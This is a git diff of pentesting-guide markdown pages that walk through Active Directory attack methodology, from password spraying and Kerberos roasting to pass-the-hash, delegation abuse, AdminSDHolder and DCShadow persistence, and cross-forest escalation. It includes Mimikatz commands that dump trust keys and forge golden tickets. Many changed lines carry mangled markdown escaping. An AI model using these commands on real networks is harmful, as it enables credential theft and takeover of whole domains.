@ -79,7 +79,7 @@ Ok, so you know you have already a valid username but no passwords...Then try:
* \*\*\*\*[**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _**DONT\_REQ\_PREAUTH**_ you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
* \*\*\*\*[**Password Spraying**](password-spraying.md): Let's **try** the most **common passwords** with each of the discovered users, maybe some user is using a bad password \(keep in mind the password policy\)
* A final option if the accounts cannot be locked is the ****[**traditional bruteforce**](password-spraying.md) **\(be careful\)**.
* A final option if the accounts cannot be locked is the **\*\*\[**traditional bruteforce**\]\(password-spraying.md\)** \(be careful\)\*\*.
## Enumerating Active Directory \(Some creds/Session\)
@ -88,7 +88,7 @@ For this phase you need to have **compromised the credentials or a session of a
### Enumeration
If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
Regarding [**ASREPRoast** ](asreproast.md)you can now find every possible vulnerable user, and regarding ****[**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account \(if you know it\). It's very easy to obtain all the domain usernames from Windows \(`net user /domain` ,`Get-DomainUser`or `wmic useraccount get name,sid`\). In **linux** you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`
Regarding [**ASREPRoast** ](asreproast.md)you can now find every possible vulnerable user, and regarding **\*\*\[**Password Spraying**\]\(password-spraying.md\) you can get a** list of all the usernames **and try the password of the compromised account \(if you know it\). It's very easy to obtain all the domain usernames from Windows \(`net user /domain` ,`Get-DomainUser`or `wmic useraccount get name,sid`\). In** linux\*\* you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`
Having compromised an account is a **big step to start compromising the whole domain**, because you are going to be able to start the **Active Directory Enumeration:**
@ -97,7 +97,7 @@ Having compromised an account is a **big step to start compromising the whole do
* If you are using **Linux**, you could also [enumerate the domain using **pywerview**](https://github.com/the-useless-one/pywerview)**.**
* You could also **try** [**https://github.com/tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)\*\*\*\*
**Even if this Enumeration section looks small this is the most important part of all. Access the links \(mainly the one of cmd, powershell, powerview and BloodHound\), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.**
**Even if this Enumeration section looks small this is the most important part of all. Access the links \(mainly the one of cmd, powershell, powerview and BloodHound\), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.**
### **Kerberoast**
@ -108,7 +108,7 @@ You can know that a **user account** is being used as a **service** because the
### Local Privilege Escalation
If you have compromised credentials or a session as a regular domain user and you have **access** with this user to **any machine in the domain** you should try to find your way to **escalate privileges locally**. This is because only with admin privileges you will be able to **dump hashes of other users** in memory \(LSASS\) and locally \(SAM\).
There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a ****[**checklist**](../checklist-windows-privilege-escalation.md). Also, don't forget to try ****[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a **\*\*\[**checklist**\]\(../checklist-windows-privilege-escalation.md\). Also, don't forget to try \*\***[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
### Win-RM
@ -122,14 +122,14 @@ Once you have obtained some credentials you could check if you have **access** t
### Hash extraction
Hopefully you have managed to **compromise some local admin** account using [ASREPROast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md), [EvilSSDP](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [Enumerating](./#enumerating-active-directory)... or [escalating privileges locally](../windows-local-privilege-escalation/).
Then, its time to dump all the hashes in memory and locally.
Then, its time to dump all the hashes in memory and locally.
[**Read this page about different ways to obtain the hashes.**](../stealing-credentials/)\*\*\*\*
### **Pass the Hash**
**Once you have the hash of a user**, you can use it to **impersonate** it.
You need to use some **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.
****[**More information about this attack and about how does NTLM works here.**](../ntlm/#pass-the-hash)\*\*\*\*
**\*\*\[**More information about this attack and about how does NTLM works here._\*\]\(../ntlm/\#pass-the-hash\)\_\*\*\*
### **Over Pass the Hash/Pass the Key**
@ -139,20 +139,20 @@ This attack aims to **use the user NTLM hash to request Kerberos tickets**, as a
### **Pass the Ticket**
This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.
****[**More information about Pass the Ticket here.**](pass-the-ticket.md)\*\*\*\*
**\*\*\[**More information about Pass the Ticket here._\*\]\(pass-the-ticket.md\)\_\*\*\*
### **MSSQL Trusted Links**
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host \(if running as SA\).
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host \(if running as SA\).
Also, if a MSSQL instance is trusted \(database link\) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.
**The links between databases work even across forest trusts.**
[**More information about this technique here.**](mssql-trusted-links.md)\*\*\*\*
### **Unconstrained Delegation**
**If you find any Computer object with the attribute** [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300%28v=vs.85%29.aspx) and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer.
**If you find any Computer object with the attribute** [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300%28v=vs.85%29.aspx) and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer.
So, if a **Domain Admin logins onto the computer**, you will be able to dump his TGT and impersonate him using [Pass the Ticket](pass-the-ticket.md).
Thanks to constrained delegation you could even **automatically compromise a Print Server** \(hopefully it will be a DC\).
Thanks to constrained delegation you could even **automatically compromise a Print Server** \(hopefully it will be a DC\).
[**More information about this technique here.**](unconstrained-delegation.md)\*\*\*\*
### **Constrained Delegation**
@ -202,12 +202,12 @@ The Silver ticket attack is based on **crafting a valid TGS for a service once t
The Access Control List \(ACL\) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder** for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group \(in an hour\).
And if someone tries to delete this user from the Domain Admins \(for example\) in an hour or less, the user will be back in the group.
****[**More information about AdminSDHolder Group here.**](privileged-accounts-and-token-privileges.md#adminsdholder-group)\*\*\*\*
**\*\*\[**More information about AdminSDHolder Group here._\*\]\(privileged-accounts-and-token-privileges.md\#adminsdholder-group\)\_\*\*\*
### **DSRM Credentials**
There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.
****[**More information about DSRM Credentials here.**](dsrm-credentials.md)
**\*\*\[**More information about DSRM Credentials here.\*\*\]\(dsrm-credentials.md\)
### **ACL Persistence**
@ -217,7 +217,7 @@ You could **give** some **special permissions** to a **user** over some specific
### **Security Descriptors**
The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
****[**More information about Security Descriptors here.**](security-descriptors.md)\*\*\*\*
**\*\*\[**More information about Security Descriptors here._\*\]\(security-descriptors.md\)\_\*\*\*
### Skeleton Key
@ -228,13 +228,13 @@ The **security descriptors** are used to **store** the **permissions** an **obje
[Learn what is a SSP \(Security Support Provider\) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)
You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
****[**More information about Custom SSP here.**](custom-ssp.md)
**\*\*\[**More information about Custom SSP here.\*\*\]\(custom-ssp.md\)
### **DCShadow**
It registers a **new Domain Controller** in the AD and uses it to **push attributes** \(SIDHistory, SPNs...\) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.
Note that if you use wrong data, pretty ugly logs will appear.
****[**More information about DCShadow here.**](dcshadow.md)
**\*\*\[**More information about DCShadow here.\*\*\]\(dcshadow.md\)
## **Forest Privilege Escalation -** Domain Trusts
@ -244,10 +244,10 @@ Microsoft considers that the **domain isn't a Security Boundary**, the **Forest
At a high level, a [**domain trust**](http://technet.microsoft.com/en-us/library/cc759554%28v=ws.10%29.aspx) establishes the ability for **users in one domain to authenticate** to resources or act as a [security principal](https://technet.microsoft.com/en-us/library/cc780957%28v=ws.10%29.aspx) **in another domain**.
Essentially, all a trust does is **linking up the authentication systems of two domains** and allowing authentication traffic to flow between them through a system of referrals.
Essentially, all a trust does is **linking up the authentication systems of two domains** and allowing authentication traffic to flow between them through a system of referrals.
When **2 domains trust each other they exchange keys**, these **keys** are going to be **saved** in the **DCs** of **each domains** \(**1 key per trust direction**\) and the keys will be the base of the trust.
When a **user** tries to **access** a **service** on the **trusting domain** it will request an **inter-realm TGT** to the DC of its domain. The DC wills serve the client this **TGT** which would be **encrypted/signed** with the **inter-realm** **key** \(the key both domains **exchanged**\). Then, the **client** will **access** the **DC of the other domain** and will **request** a **TGS** for the service using the **inter-realm TGT**. The **DC** of the trusting domain will **check** the **key** used, if it's ok, it will **trust everything in that ticket** and will serve the TGS to the client.
When a **user** tries to **access** a **service** on the **trusting domain** it will request an **inter-realm TGT** to the DC of its domain. The DC wills serve the client this **TGT** which would be **encrypted/signed** with the **inter-realm** **key** \(the key both domains **exchanged**\). Then, the **client** will **access** the **DC of the other domain** and will **request** a **TGS** for the service using the **inter-realm TGT**. The **DC** of the trusting domain will **check** the **key** used, if it's ok, it will **trust everything in that ticket** and will serve the TGS to the client.
![](../../.gitbook/assets/image%20%2865%29.png)
@ -281,7 +281,7 @@ There are three **main** ways that security principals \(users/groups/computer\)
### Child-to-Parent forest privilege escalation
Also, notice that there are **2 trusted keys**, one for _Child --&gt; Parent_ and another one for P_arent --&gt; Child_.
Also, notice that there are **2 trusted keys**, one for _Child --&gt; Parent_ and another one for P_arent --&gt; Child_.
```bash
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
@ -300,7 +300,7 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarco
/ticket:C:\path\save\ticket.kirbi
```
For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21_root domain_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21_root domain_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
[http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
@ -398,8 +398,6 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

2
windows/checklist-windows-privilege-escalation.md
View file

@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*